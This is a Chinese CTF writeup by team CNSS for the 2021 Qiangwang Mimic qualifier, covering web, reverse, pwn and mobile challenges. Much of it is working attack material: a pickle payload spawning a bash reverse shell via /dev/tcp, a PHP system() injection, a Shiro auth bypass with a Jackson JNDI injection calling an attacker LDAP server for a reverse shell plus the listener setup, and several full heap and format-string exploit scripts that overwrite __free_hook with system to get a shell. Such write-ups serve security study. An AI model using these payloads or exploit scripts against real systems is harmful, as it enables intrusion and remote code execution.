拟态 2021 预选赛 Writeup - CNSS

第四届强网杯拟态挑战赛线上预选赛 Writeup By CNSS

Web

zerocalc

魔改过的 notevil 1.3.3，

题目内提示了可以任意读文件

readFile('./src/index.js')

const express = require("express");
const path = require("path");
const fs = require("fs");
const notevil = require("./notevil"); // patched something...
const crypto = require("crypto");
const cookieSession = require("cookie-session");

const app = express();
app.use(express.urlencoded({ extended: true }));
app.use(express.json());
app.use(cookieSession({
  name: 'session',
  keys: [Math.random().toString(16)],
}));

//flag in root directory but name is randomized

const utils = {
  async md5(s) {
    return new Promise((resolve, reject) => {
      resolve(crypto.createHash("md5").update(s).digest("hex"));
    });
  },
  async readFile(n) {
    return new Promise((resolve, reject) => {
      fs.readFile(n, (err, data) => {
        if (err) {
          reject(err);
        } else {
          resolve(data);
        }
      });
    });
  },
}

const template = fs.readFileSync("./static/index.html").toString();

function render(s) {
  return template.replace("{{res}}", s.join('<br/>'));
}

app.use("/", async (req, res) => {
  const e = req.body.e;
  const his = req.session.his || [];
  if (e) {
    try {

      const ret = (await notevil(e, utils)).toString();
      his.unshift(`${e} = ${ret}`);
      if (his.length > 10) {
        his.pop();
      }
    } catch (error) {
      console.log(error);
      his.add(`${e} = wrong?`);
    }
    req.session.his = his;
  }

  res.send(render(his));
});

app.use((err, res) => {
  console.log(err);
  res.redirect('/');
});

app.listen(process.env.PORT || 8888);

再拿题目内的 notevil 和 GitHub 源码 对比，

$ diff notevil/index.js test/node_modules/notevil/index.js
69,72d68
<   function walk(node, traceNode) {
<     return checkValue(_walk(node, traceNode))
<   }
< 
74c70
<   function _walk(node, traceNode){
---
>   function walk(node, traceNode){
390c386
<     if (value === Function || value===blockContext['Function']){
---
>     if (value === Function){
545c541
< }
\ No newline at end of file
---
> }

搞了半天发现，//flag in root directory but name is randomized 这句话没用

直接 readFile('/flag') 就出了

new_hospital

/feature.php?id= 页面底部有报错回显

猜测是这个逻辑

echo file_get_contents($id + '.js');

http 协议打一个 SSRF，用 # 或者 ? 过掉拼接的 .js，

测试发现有 flag.php，但是读不到

除此之外，有 cookie 会用 base64 记录 file_get_contents 的参数

多次寻求未果之后扫目录，发现存在 /old ，

/old/feature.php 会使用 API 作为 file_get_contents 的参数

改掉 cookie 里的 API 就行了

file:///var/www/html/flag.php
>>>
API: ZmlsZTovLy92YXIvd3d3L2h0bWwvZmxhZy5waHA%3D

ezPickle

https://github.com/EddieIvan01/pker

notadmin = GLOBAL('config', 'notadmin')
notadmin['admin'] = 'yes'
backdoor = GLOBAL('config', 'backdoor')
backdoor(["__import__('os').system('bash -c \\'bash -i >& /dev/tcp/ip/port 0>&1\\'')"])
return

EasyFilter

?action=w&c=<?php system('ls / -al;ls -al;cat /flag');?>
>>>
./files/a5dfb3f855


?action=r&r=convert.base64-decode/../a5dfb3f855
>>>
Warning: include(): unable to locate filter "resource=." in /var/www/html/index.php on line 16

Warning: include(): Unable to create filter (resource=.) in /var/www/html/index.php on line 16

Warning: include(): unable to locate filter "files" in /var/www/html/index.php on line 16

Warning: include(): Unable to create filter (files) in /var/www/html/index.php on line 16

Warning: include(): unable to locate filter ".." in /var/www/html/index.php on line 16

Warning: include(): Unable to create filter (..) in /var/www/html/index.php on line 16

Warning: include(): unable to locate filter "a5dfb3f855" in /var/www/html/index.php on line 16

Warning: include(): Unable to create filter (a5dfb3f855) in /var/www/html/index.php on line 16total 84
total 84
drwxr-xr-x   1 root root 4096 Oct 20 10:01 .
drwxr-xr-x   1 root root 4096 Oct 20 10:01 ..
-rwxr-xr-x   1 root root    0 Oct 20 10:01 .dockerenv
drwxr-xr-x   1 root root 4096 Dec 11  2020 bin
drwxr-xr-x   2 root root 4096 Nov 22  2020 boot
drwxr-xr-x   5 root root  340 Oct 20 10:01 dev
drwxr-xr-x   1 root root 4096 Oct 20 10:01 etc
-rw-r--r--   1 root root   38 Oct 19 08:43 flag
drwxr-xr-x   2 root root 4096 Nov 22  2020 home
drwxr-xr-x   1 root root 4096 Dec 11  2020 lib
drwxr-xr-x   2 root root 4096 Dec  9  2020 lib64
drwxr-xr-x   2 root root 4096 Dec  9  2020 media
drwxr-xr-x   2 root root 4096 Dec  9  2020 mnt
drwxr-xr-x   2 root root 4096 Dec  9  2020 opt
dr-xr-xr-x 148 root root    0 Oct 20 10:01 proc
drwx------   1 root root 4096 Dec 11  2020 root
drwxr-xr-x   1 root root 4096 Dec 11  2020 run
drwxr-xr-x   1 root root 4096 Dec 11  2020 sbin
drwxr-xr-x   2 root root 4096 Dec  9  2020 srv
dr-xr-xr-x  13 root root    0 Oct 20 10:01 sys
drwxrwxrwt   1 root root 4096 Oct 23 16:54 tmp
drwxr-xr-x   1 root root 4096 Dec  9  2020 usr
drwxr-xr-x   1 root root 4096 Dec 11  2020 var
total 76
drwxr-xr-x 1 www-data www-data  4096 Oct 23 13:47 .
drwxr-xr-x 1 root     root      4096 Dec 11  2020 ..
drwxr-xr-x 2 www-data www-data  4096 Oct 23 13:47 .2337cd59adf2
-rw-r--r-- 1 www-data www-data   674 Oct 23 13:40 .24593ant_x64.so
drwxr-xr-x 2 www-data www-data  4096 Oct 23 13:46 .7f11de3c
-rw-r--r-- 1 www-data www-data   674 Oct 23 13:39 .84929ant_x64.so
-rw-r--r-- 1 www-data www-data   674 Oct 23 13:40 .96663ant_x64.so
drwxr-xr-x 2 www-data www-data  4096 Oct 23 13:46 .a9d42722
-rw-r--r-- 1 www-data www-data  1754 Oct 23 13:40 .antproxy.php
drwxr-xr-x 2 www-data www-data  4096 Oct 23 13:47 .c4c38
drwxrwxrwx 1 root     root     20480 Oct 24 08:00 files
-rw-r--r-- 1 www-data www-data   286 Oct 23 13:40 gconv-modules
-rw-r--r-- 1 root     root       512 Sep 29 08:48 index.php
flag{Cuw5RV9SvBUJR1ACBgLBm83p2VZe7lRG}

看报错猜逻辑

原因可能是 resouce=. 这里，php 在解释的时候先尝试让 filter/ 后作为过滤器应用

发现都没法作为过滤器应用，最后再尝试读取 resource 后的作路径

所以读取的时候可以拼接一个过滤器

Jack-Shiro

Shiro 的鉴权洞 CVE-2020-11989

http://123.60.26.60:32766/;/json

下一步推测有 Jackson 的 json 反序列化洞，

找到 Jackson-2653，没有 CVE 编号

POC

["org.apache.shiro.jndi.JndiObjectFactory",{"resourceName":"ldap://<ip>:<port>/Exploit"}]

打个 JNDI 注入，https://xz.aliyun.com/t/6633 可以参考这个起 rmi、ldap 服务

直接用工具方便一点，https://github.com/feihong-cs/JNDIExploit

在VPS上面跑

docker run -it -p 60002:60002 -p 60003:60003 -v /home/casio/JNDIExploit/:/JNDIExploit openjdk:8u181-jdk

java -jar JNDIExploit.jar -i 127.0.0.1 -l 60002 -p 60003

nc -lvvp 60008

EXP

["org.apache.shiro.jndi.JndiObjectFactory",{"resourceName":"ldap://<ip>:60002/Deserialization/CommonsBeanutils1/ReverseShell/<ip>/60008"}]

Give_me_your_0day

未解出

Reverse

fastjs

修改 QuickJS 源码

添加宏定义 #define DUMP_BYTECODE (1)

在 JS_ReadFunctionTag 函数中添加 js_dump_function_bytecode(ctx, b);

提取 fastjs 中的字节码重新编译得到可读的 opcode

通过符号可以找到用于加密的源代码

function long2str(v, w) {
    var vl = v.length;
    var sl = v[vl - 1] & 0xffffffff;
    for (var i = 0; i < vl; i++)
    {
        v[i] = String.fromCharCode(v[i] & 0xff,
                                   v[i] >>> 8 & 0xff,
                                   v[i] >>> 16 & 0xff, 
                                   v[i] >>> 24 & 0xff);
    }
    if (w) {
        return v.join('').substring(0, sl);
    }
    else {
        return v.join('');
    }
}
 
function str2long(s, w) {
    var len = s.length;
    var v = [];
    for (var i = 0; i < len; i += 4)
    {
        v[i >> 2] = s.charCodeAt(i)
                  | s.charCodeAt(i + 1) << 8
                  | s.charCodeAt(i + 2) << 16
                  | s.charCodeAt(i + 3) << 24;
    }
    if (w) {
        v[v.length] = len;
    }
    return v;
}
 
function xxtea_encrypt(str, key) {
    if (str == "") {
        return "";
    }
    var v = str2long(str, true);
    var k = str2long(key, false);
    var n = v.length - 1;
 
    var z = v[n], y = v[0], delta = 0x9E3779B9;
    var mx, e, q = Math.floor(6 + 52 / (n + 1)), sum = 0;
    while (q-- > 0) {
        sum = sum + delta & 0xffffffff;
        e = sum >>> 2 & 3;
        for (var p = 0; p < n; p++) {
            y = v[p + 1];
            mx = (z >>> 5 ^ y << 2) + (y >>> 3 ^ z << 4) ^ (sum ^ y) + (k[p & 3 ^ e] ^ z);
            z = v[p] = v[p] + mx & 0xffffffff;
        }
        y = v[0];
        mx = (z >>> 5 ^ y << 2) + (y >>> 3 ^ z << 4) ^ (sum ^ y) + (k[p & 3 ^ e] ^ z);
        z = v[n] = v[n] + mx & 0xffffffff;
    }
 
    return str2Hex(long2str(v, false));
}
 
function xxtea_decrypt(str, key) {
    if (str == "") {
        return "";
    }
 
    str=hex2str(str);
    var v = str2long(str, false);
    var k = str2long(key, false);
    var n = v.length - 1;
 
    var z = v[n - 1], y = v[0], delta = 0x9E3779B9;
    var mx, e, q = Math.floor(6 + 52 / (n + 1)), sum = q * delta & 0xffffffff;
    while (sum != 0) {
        e = sum >>> 2 & 3;
        for (var p = n; p > 0; p--) {
            z = v[p - 1];
            mx = (z >>> 5 ^ y << 2) + (y >>> 3 ^ z << 4) ^ (sum ^ y) + (k[p & 3 ^ e] ^ z);
            y = v[p] = v[p] - mx & 0xffffffff;
        }
        z = v[n];
        mx = (z >>> 5 ^ y << 2) + (y >>> 3 ^ z << 4) ^ (sum ^ y) + (k[p & 3 ^ e] ^ z);
        y = v[0] = v[0] - mx & 0xffffffff;
        sum = sum - delta & 0xffffffff;
    }
 
    return long2str(v, true);
}
 
function str2Hex(input) { 
    var output = ""; 
    var chr1 = ""; 
    var i = 0;
    do { 
        chr1 = input.charCodeAt(i++).toString(16); 
	if(chr1.length==1)chr1="0"+chr1;
	output+=chr1;
    } while (i < input.length);
    return output; 
}
 
function hex2str(input) {
    var output="";
    var i=0;
    while(i<input.length){
        var k = parseInt(input.substr(i,1),16)<<4 | parseInt(input.substr(++i,1),16);
        k=k&255;
        output+=String.fromCharCode(k);
        ++i;
    }
    return output;
}
 
//base64_encodeAndDecode
function Base64() {
}
Base64._keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; 
Base64.encode64 = function (input) { 
    var output = ""; 
    var chr1, chr2, chr3 = ""; 
    var enc1, enc2, enc3, enc4 = ""; 
    var i = 0;
    do { 
        chr1 = input.charCodeAt(i++); 
        chr2 = input.charCodeAt(i++); 
        chr3 = input.charCodeAt(i++);
        enc1 = chr1 >> 2; 
        enc2 = ((chr1 & 3) << 4) | (chr2 >> 4); 
        enc3 = ((chr2 & 15) << 2) | (chr3 >> 6); 
        enc4 = chr3 & 63;
        if (isNaN(chr2)) { 
            enc3 = enc4 = 64; 
        } else if (isNaN(chr3)) { 
            enc4 = 64; 
        }
        output = output + 
           Base64._keyStr.charAt(enc1) + 
           Base64._keyStr.charAt(enc2) + 
           Base64._keyStr.charAt(enc3) + 
           Base64._keyStr.charAt(enc4); 
        chr1 = chr2 = chr3 = ""; 
        enc1 = enc2 = enc3 = enc4 = ""; 
    } while (i < input.length);
    return output; 
}
 
Base64.decode64 = function (input) { 
    var output = ""; 
    var chr1, chr2, chr3 = ""; 
    var enc1, enc2, enc3, enc4 = ""; 
    var i = 0;
    var base64test = /[^A-Za-z0-9\\+\\/\\=\\n]/g; 
    if (base64test.exec(input)) { 
        return "error";
    } 
    input = input.replace(/[^A-Za-z0-9\\+\\/\\=]/g, "");
    do { 
        enc1 = Base64._keyStr.indexOf(input.charAt(i++)); 
        enc2 = Base64._keyStr.indexOf(input.charAt(i++)); 
        enc3 = Base64._keyStr.indexOf(input.charAt(i++)); 
        enc4 = Base64._keyStr.indexOf(input.charAt(i++));
        chr1 = (enc1 << 2) | (enc2 >> 4); 
        chr2 = ((enc2 & 15) << 4) | (enc3 >> 2); 
        chr3 = ((enc3 & 3) << 6) | enc4;
        output = output + String.fromCharCode(chr1);
        if (enc3 != 64) { 
            output = output + String.fromCharCode(chr2); 
        } 
        if (enc4 != 64) { 
            output = output + String.fromCharCode(chr3); 
        }
        chr1 = chr2 = chr3 = ""; 
        enc1 = enc2 = enc3 = enc4 = "";
    } while (i < input.length);
    return output; 
}

执行下面的命令得到 flag

Base64.decode64(xxtea_decrypt("05aed0ce441f80b5bc36af4c698509fc6cc3c97146353de5a95c6abea07fd4a7070932d86ac32d628672a59123e5972331db5dffe7057362","no_thing_is_true"))
'flag{fc5e038d38a57032085441e7fe7010b0}'

marmgic

程序实现了一个类似于魔方的变形

根据校验的表达式，可以在54块中选5个进行组合

从而求出每个面的边角以及中心的块

由于变形过程中魔方边角的三个块具有固定的相对位置

所以可以推断出每个块在面上的具体位置

最后枚举每个面上剩余四个块的排列即可得到答案

#include <cstdio>
#include <algorithm>
#include <cstring>
using namespace std;
unsigned int p[]={
0x472ECBDF, 0x20DB1A28, 0xA8FD9C14, 0x2A5800F0, 0xE1B8C757,
0x5AA73EE9, 0xEF262FE2, 0x2341E61E, 0x4F8B4C24,
0xC5919DF, 0x10271DCA, 0xBE0AABA8, 0xF3001CAD, 0x3D9BFB3D,
0xBCEC5E4D, 0x10D780AC, 0x9537CA60, 0x9F024F5D,
0xD22BC207, 0x4000F0AC, 0x24C4BA66, 0x8523EA8A, 0x66D95F75,
0x988ADF8A, 0x76F57D90, 0x42BA7FCF, 0x22FF7C2F,
0x3A661CBD, 0x5578F063, 0x76D83FC5, 0x699EA4A7, 0xCA324955,
0xC6A8998D, 0xFA2A09D2, 0x158673D9, 0x66CE0371,
0xB8F2D37F, 0x19794181, 0x993737EE, 0x749C7985, 0x5A9734C3,
0xEA59355A, 0xC73E3987, 0x22EB465B, 0x8B50A4CF,
0x2FA4B4E6, 0x3AA763C7, 0x67057097, 0x155D753, 0x423159C0,
0x9F54FA00, 0x8AAAFCD, 0xE468BB71, 0x4CCCFB83};
unsigned int c[]={
0x99C57520, 0x177E3A5A, 0x717D831F, 0x69A5977F, 0x8CAF8A2D,
0x23B374E2, 0x8062C165, 0xEFE98B3F, 0x6CE0568A, 0xAAB6B3F,
0x45057390, 0x2EA6430};
unsigned int q[]={
0x81BFE181, 0x544F470A, 0x728880C0, 0xD613137B, 0x86970C9F,
0xE1000000, 0x9CA8076B, 0xDA10007D, 0x3062EB2, 0x32C600E7,
0x588001F3, 0x24224983, 0x3C804776, 0xA07004E0, 0xC079035,
0xCCA4D614, 0x4780C084, 0x537A407F, 0x2A20833, 0x37FFFEED,
0x83220421, 0x2B8A0884, 0xF1719016, 0x552BC509, 0xCB104A8D,
0xBD4B0696, 0x47B945F8, 0x58D1FFFF, 0x5B7F0D80, 0xEC3A938F,
0xCCBAB640, 0x3EA60422, 0x3F80589B, 0x436C57F8, 0xA2A000C0,
0x2E86F33C, 0x79C1E7FF, 0x3092311F, 0x379526BD, 0xA776EEFC,
0xFCA2C92C, 0x20000000, 0x2FD60000, 0xE2B81F5A, 0x476EE8A2,
0x7E1F777C, 0x81550ED6, 0x61D70225, 0x10602644, 0x5CD4A40,
0xC0120000, 0xF8214B14, 0x77000000, 0x5953BBF0};
unsigned int side1[30],side2[30],reg[6],ans[12][5];
void init(){
    for (int i=0;i<6;i++){
        side1[i*5+0]=i*9+0,side1[i*5+1]=i*9+2,side1[i*5+2]=i*9+6,side1[i*5+3]=i*9+8,side1[i*5+4]=i*9+4;
        side2[i*5+0]=i*9+1,side2[i*5+1]=i*9+3,side2[i*5+2]=i*9+5,side2[i*5+3]=i*9+7,side2[i*5+4]=i*9+4;
    }
}
void find(int begin,int dep,int v,unsigned int *side,int now){
    if (dep==0){
        int sum=0;
        for (int i=5;i>=1;i--) sum+=p[side[reg[i]]];
        if (sum==v){
            for (int i=5;i>=1;i--){
                printf("%d(%d,%d)\\t",side[reg[i]],6-side[reg[i]]/9,side[reg[i]]%9);
                ans[now][i-1]=side[reg[i]];
            }
            printf("\\n");
        }
        return;
    }
    for (int i=begin;i<30;i++){
        reg[dep]=i;
        find(i+1,dep-1,v,side,now);
    }
}
void check1(){ // X
    for (int i=0;i<6;i++){
        printf("X %d : ",i+1);
        find(0,5,c[i*2],side1,i);
    }
}
void check2(){ // X
    for (int i=0;i<6;i++){
        printf("+ %d : ",i+1);
        find(0,5,c[i*2+1],side2,6+i);
    }
}
int buf[][9]={
{13,27,35,44,45,21,32,37,39},
{4,26,36,47,53,19,41,43,46},
{11,18,38,51,1,3,5,7,40},
{6,15,24,42,14,23,25,34,49},
{10,12,48,50,0,2,17,22,29},
{8,9,20,33,31,16,28,30,52}
};
int con[][10]={
{3,8,1,0,5,4,2,8,3,0},
{4,8,2,0,6,4,1,2,1,8},
{4,0,1,6,2,4,2,2,5,2},
{5,6,4,6,1,4,2,6,6,6},
{5,8,6,2,4,4,6,0,3,2},
{4,2,5,0,3,4,6,8,3,6}
};
int main(){
    init();
    check1();
    check2();
    for (int j=0;j<6;j++){
        sort(buf[j],buf[j]+9);
        do{
            unsigned int sum=0;
            for (int i=0;i<9;i++)
                sum+=p[buf[j][i]]*q[(5-j)*9+i];
            unsigned char *w=(unsigned char *)&sum;
            if (buf[j][0]==(6-con[j][0])*9+con[j][1])
            if (buf[j][2]==(6-con[j][2])*9+con[j][3])
            if (buf[j][4]==(6-con[j][4])*9+con[j][5])
            if (buf[j][6]==(6-con[j][6])*9+con[j][7])
            if (buf[j][8]==(6-con[j][8])*9+con[j][9])
                if (w[0]<=128&&w[1]<=128&&w[2]<=128&&w[3]<=128)
                printf("%c%c%c%c\\n",w[0],w[1],w[2],w[3]);
        }while(next_permutation(buf[j],buf[j]+9));
    }
}

loop

从 TCP 读取从 @ 开始到 ! 结束的节点序列

程序会对路径上所有的有向边权值进行求和

每一次循环时首先会从 TCP 读取之前的求和结果以及节点序列

随后将当前有向边的权值累加到求和结果中

再将新的求和结果以及剩余的节点序列的写入到 TCP 中

等待下一次循环继续处理

最终求和结果不大于 0xD47C5 时会返回 Right

DWORD GRAPH_TABLE[128][128] 是有向边权值表

设置起点和终点分别是 @ 和 !，直接 DFS 搜索即可

#include <cstdio>
#include "table.h"
int ans[128];
unsigned int *f=(unsigned int *)graph;
void dfs(int x,int fa,int sum,int dep){
	ans[dep]=x;
	if (sum>0xD47C5) return;
	if (x=='!'){
        printf("flag{");
		for (int i=0;i<=dep;i++){
			printf("%c",ans[i]);
		}
		printf("}\\n");
		return;
	}
	for (int i=32;i<128;i++){
		if (i!=fa){
			dfs(i,x,sum+f[x*128+i],dep+1);
		}
	}
	return;
}
int main(){
	dfs('@',-1,0,0);
}

show_your_flag

未解出

Pwn

bitflip

def add(idx, size):
    sendla("choice", "1")
    sendla("Index", str(idx))
    sendla("Size", str(size))

def edit(idx, cont):
    sendla("choice", "2")
    sendla("Index", str(idx))
    senda("Content", cont)

def show(idx):
    sendla("choice", "3")
    sendla("Index", str(idx))

def delete(idx):
    sendla("choice", "4")
    sendla("Index", str(idx))

def magic(idx):
    sendla("choice", str(0x666))
    sendla("Addr", str(idx))


def exp():
    # [1] leak
    add(0, 0x38)
    add(1, 0x38)
    delete(0)
    delete(1)
    add(0, 0x38)
    show(0)
    recvu("Content: ")
    a_heap = u64(recvn(6)+b"\x00\x00")-0x260
    log.success(hex(a_heap))
    delete(0)

    for i in range(2, 0x18):
        add(i, 0x48)
    magic(a_heap+0x2a1)
    add(0x19, 0x38)
    add(0x1a, 0x38)
    edit(0x1a, b"A"*0x18+p64(0x461)+b"\n")
    delete(4)
    add(0x1b, 0x18)
    show(0x1b)
    recvu("Content: ")
    a_libc = u64(recvn(6)+b"\x00\x00")-0x3ec0a0
    from mypwn import libc
    libc.address = a_libc
    print(hex(a_libc))

    # [2] hijack
    add(0x1c, 0x48)
    delete(0x18)
    delete(5)
    edit(0x1c, b"A"*0x28+p64(0x51)+p64(libc.symbols["__free_hook"])+b"\n")
    add(0x1d, 0x48)
    add(0x1f, 0x48)
    edit(0x1f, p64(libc.symbols["system"])+b"\n")
    edit(0x1d, b"/bin/sh\x00\n")
    delete(0x1d)
    getshell()

old_school

def add(idx, size):
    sendla("choice", "1")
    sendla("Index", str(idx))
    sendla("Size", str(size))

def edit(idx, cont):
    sendla("choice", "2")
    sendla("Index", str(idx))
    senda("Content", cont)

def show(idx):
    sendla("choice", "3")
    sendla("Index", str(idx))

def delete(idx):
    sendla("choice", "4")
    sendla("Index", str(idx))

def exp():
    # [1] leak
    for i in range(9):
        add(i, 0xe8)
    add(9, 0x10)
    add(10, 0x10)
    for i in range(9):
        delete(i)
    add(0, 0xf8)
    show(0)
    recvu("Content: ")
    a_libc = u64(recvn(6)+b"\x00\x00")-0x3ebe70
    from mypwn import libc
    libc.address = a_libc
    print(hex(a_libc))

    # [2] hijack
    add(1, 0xb8)
    edit(1, b"A"*0xb8+b"\x41")
    add(2, 0x30)
    delete(10)
    delete(9)
    edit(2, b"A"*0x18+p64(0x20)+p64(libc.symbols["__free_hook"])+b"\n")
    add(3, 0x10)
    add(4, 0x10)
    edit(4, p64(libc.symbols["system"])+b"\n")
    edit(3, b"/bin/sh\x00\n")
    delete(3)
    getshell()

old_school_revenge

def add(idx, size):
    sendla("choice", "1")
    sendla("Index", str(idx))
    sendla("Size", str(size))

def edit(idx, cont):
    sendla("choice", "2")
    sendla("Index", str(idx))
    senda("Content", cont)

def show(idx):
    sendla("choice", "3")
    sendla("Index", str(idx))

def delete(idx):
    sendla("choice", "4")
    sendla("Index", str(idx))

def exp():
    # [1] leak
    for i in range(9):
        add(i, 0xe8)
        edit(i, chr(i)*0xe7+"\n")
    add(0xf, 0x18)
    for i in range(9):
        delete(i)
    add(0, 0xf8)
    show(0)
    recvu("Content: ")
    a_libc = u64(recvn(6)+b"\x00\x00")-0x3ebe70
    from mypwn import libc
    libc.address = a_libc
    print(hex(a_libc))

    # [2] hijack
    add(0x10, 0x100)
    edit(0x10, 0xf0*b"A"+p64(0x100)+p64(0x11))
    edit(0xf, b"A"*0x10+p64(0x100)+b"\n")
    for i in range(8):
        add(0x15+i, 0xf0)
    for i in range(8):
        delete(0x15+i)
    delete(0x10)
    add(0x10, 0x10)
    delete(0x10)
    delete(0xf)
    add(0x10, 0xb0)
    add(0x11, 0xb0)
    edit(0x11, p64(libc.symbols["__free_hook"])+b"\n")
    add(3, 0x10)
    add(4, 0x10)
    edit(4, p64(libc.symbols["system"])+b"\n")
    edit(3, b"/bin/sh\x00\n")
    delete(3)
    #debug()
    getshell()

oldecho

def exp():
    recvu("Gift: ")
    a_stack = int(recvu("\n"), 16)
    a_ret = a_stack - 0x10
    log.success(hex(a_stack))
    if ((a_stack&0xffff)-0x120) > 0x1000:
        raise EOFError
    BYTE = lambda x:((a_stack)&0xff)+x
    WORD = lambda x:((a_stack)&0xffff)+x

    if setting["remote"]:
        # try_idx = int(input())
        # try_idx = randint(14, 40)
        try_idx = 15
        debug("bb 0xdbd\nc")
        sendl("%{}d%6$hn".format(WORD(8*(try_idx-9))))

        sendl("%{}d%10$hn".format(WORD(-0x128)))
        sendl("%{}d%{}$hn".format(0x0dc5, try_idx))

        sendl("%{}d%10$hn".format(WORD(-0x18)))
        sendl("%{}d%{}$hn".format(WORD(-0x130), try_idx))

        sendl("%{}d%10$hn".format(WORD(-0x10)))
        # debug("bb 0xe3e\nc")
        sendl("%{}d%{}$hhn".format(0x3e, try_idx))

    # what
    a_stack-=0x148
    sendl("%{}d%19$hn".format(WORD(0xa0)))
    sendl("%{}d%20$hhn".format(0x90))
    sendl("AA%26$hhn")

    recvu("AA")
    sendl("%26$p")
    a_libc = int(recv(), 16)-0x3c5690
    from mypwn import libc
    libc.address = a_libc
    log.success(hex(a_libc))
    sendl("%7$p")
    a_elf = int(recv(), 16)-0xe1e
    log.success(hex(a_elf))

    gadget = lambda x:(libc.address + x)
    pdi_r = gadget(0x0000000000021112) #
    psi_r = gadget(0x00000000000202f8) #
    pdx_r = gadget(0x0000000000001b92) #
    a_fake_stack = a_elf+0x202040+0x20
    a_filename = a_fake_stack + 0xb0
    a_flag = a_fake_stack - 0x20

    orw_stack = \
            p64(pdi_r) + p64(a_filename) + \
            p64(psi_r) + p64(0) + \
            p64(pdx_r) + p64(0) + \
            p64(libc.symbols["open"]) + p64(pdi_r) + \
            p64(1) + p64(psi_r) + \
            p64(a_flag) + p64(pdx_r) + \
            p64(100) + p64(libc.symbols["read"]) + \
            p64(pdi_r) + p64(2) + \
            p64(psi_r) + p64(a_flag) + \
            p64(pdx_r) + p64(100) + \
            p64(libc.symbols["write"]) + p64(0) + \
            b"flag\x00"

    print(len(orw_stack))
    if b"\x0a" in orw_stack:
        raise EOFError
    sendl(b"A"*0x20+orw_stack)

    target = a_fake_stack-0x8
    for i in range(8):
        sendl("%{}d%19$hn".format(WORD(i)))
        n = (target>>(8*i))&0xff
        if n < 0x20:
            sendl("A"*n+"%20$hhn")
        else:
            sendl("%{}d%20$hhn".format(n))

    # debug("bb 0xe3e\nc")
    print("Ready!")
    input()
    sendl("Bye~\x00")

    getshell()

while 1:
    io = start_program()
    try:
        exp()
        break
    except EOFError:
        stop_program()

random_heap

def add(idx, size):
    sendla("choice", "1")
    sendla("Index", str(idx))
    sendla("Size", str(size))

def edit(idx, cont):
    sendla("choice", "2")
    sendla("Index", str(idx))
    senda("Content", cont)

def show(idx):
    sendla("choice", "3")
    sendla("Index", str(idx))

def delete(idx):
    sendla("choice", "4")
    sendla("Index: ", str(idx))

def exp():
    # [1] leak
    add(1, 0x100)
    add(2, 0x100)
    for _ in range(7):
        delete(1)
        edit(1, "A"*0x10)
    delete(1)
    show(1)
    recvu("Content: ")
    a_libc = u64(recvn(6)+b"\x00\x00")-0x3ebca0
    from mypwn import libc
    libc.address = a_libc
    print(hex(a_libc))

    for i in range(3, 3+0x8):
        add(i, 0x80)
        delete(i)
        edit(i, p64(libc.symbols["__free_hook"])+p64(0))
        delete(i)
        edit(i, p64(libc.symbols["__free_hook"])+p64(0))

    for i in range(3+0x10, 3+0x18):
        add(i, 0x80)
    for i in range(3+0x20, 3+0x28):
        add(i, 0x80)
        edit(i, p64(libc.symbols["system"]))
    edit(4, "/bin/sh\x00")
    delete(4)
    # debug()

    getshell()

for _ in range(0x10*0x10):
    try:
        start_program()
        exp()
    except Exception:
        stop_program()

bornote

def add(size):
    sendla("cmd", "1")
    sendla("Size", str(size))

def delete(idx):
    sendla("cmd", "2")
    sendla("Index", str(idx))

def edit(idx, cont):
    sendla("cmd", "3")
    sendla("Index", str(idx))
    sendla("Note", cont)

def show(idx):
    sendla("cmd", "4")
    sendla("Index", str(idx))

def exit(idx):
    sendla("cmd", "5")

def exp():
    sendla("name", "k1r0a")

    # Leak
    add(0x500)
    add(0x500)
    delete(0)
    add(0x500)
    show(0)
    recvu("Note: ")
    a_libc = u64(recvn(6)+b"\x00\x00") - 0x1ebbe0
    print(hex(a_libc))
    delete(0)
    delete(1)

    add(0x10)
    add(0x10)
    delete(0)
    delete(1)
    add(0x10)
    show(0)
    recvu("Note: ")
    a_heap = u64(recvn(6)+b"\x00\x00")+0x30
    print(hex(a_heap))
    delete(0)

    # Hijack
    from mypwn import libc
    libc.address = a_libc
    add(0x228) #0
    add(0x28) #1 0x30
    add(0x518) #2
    add(0x28) #3
    edit(0, p64(0)+p64(0x251)+p64(a_heap+0x20)+p64(a_heap+0x20)+\
            p64(a_heap+0x10)+p64(a_heap+0x10))
    edit(1, b"A"*0x20+p64(0x250)) # off by null
    edit(2, b"A"*0x4f8+p64(0x21))
    delete(3)
    delete(1)
    delete(2)
    add(0x228) #1
    edit(1, b"A"*0x220+p64(libc.symbols["__free_hook"]))

    add(0x28) #2
    add(0x28) #3
    edit(2, "/bin/sh\x00")
    edit(3, p64(libc.symbols["system"]))
    delete(2)
    getshell()

pwnpwn

from pwn import *
context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']

# p = process("./pwnpwn")
p = remote('124.71.156.217', 49153)
elf = ELF("./pwnpwn")
libc = ELF("libc-2.23.so")
bin_sh_addr = 0x202010
pop_rdi_ret = 0x0000000000000b83

def main():
    p.sendline(b"1")
    p.recvuntil(b"0x")
    elf.base = int(p.recvuntil(b"\n", drop=True), 16) - 0x9B9 
    log.info("elf.base ======> 0x%x"%elf.base)

    # gdb.attach(p, "b *0x5555555549F6\n")
    p.sendline(b"2")
    payload = b"abcd%21$p"
    p.sendlineafter(b"hello", payload)
    p.recvuntil(b"abcd")
    canary = int(p.recvuntil(b"\n", drop=True), 16)
    log.info("cananry =======> 0x%x"%canary)

    # pause()
    # p.sendline(b"2")
    payload = b"a" * 0x68 + p64(canary) + p64(0xdeadbeef) + p64(elf.base + 0xa2c) + p64(elf.base + pop_rdi_ret) + p64(elf.base + bin_sh_addr) + p64(elf.base + elf.plt['system'])
    p.sendline(payload)
    # p.sendlineafter("", payload)
    p.interactive()

if __name__ == "__main__":
    main()

sonic

def exp():
    recvu("main Address=")
    elf_base = int(recvu("\n"),16) - 0x7cf
    from mypwn import elf
    elf.address = elf_base
    print(hex(elf_base))
    sendla("login", b"A"*0x28+p64(elf_base+0x73a))
    getshell()

Mobile

HaHaHaHa

• 程序逻辑
  1. 初始化的时候对 algflag 和加密的 keys 都进行了变换
  2. 8 个输入，每个输入长度为 8 的 string，经过转化为 4 btyes
  3. 每组分别计算 hash，提取 4 个 bytes 的最高位作为选择算法的 algflag（查看最后的 check 算法可以看出来这个 algflag 是固定的）剩下的数据用于计算
  4. 将 hash 结果与 cipher 比较

写个同样算法的 java 程序挨个进行爆破就行了，题目提示了没有小写字母。最后注意某些情况需要调整端序

HmacSha512 部分爆破代码，对于其他算法都是一样的

import java.security.MessageDigest;
import java.math.BigInteger;
